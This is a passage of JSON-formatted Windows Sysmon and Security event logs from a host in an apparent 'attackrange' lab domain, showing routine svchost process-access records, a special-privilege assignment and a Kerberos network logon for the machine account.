C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220441,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x659F3\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x659f3","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220442,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x659F3\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50145\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x659f3","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50145","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:47.907\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:47.907","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e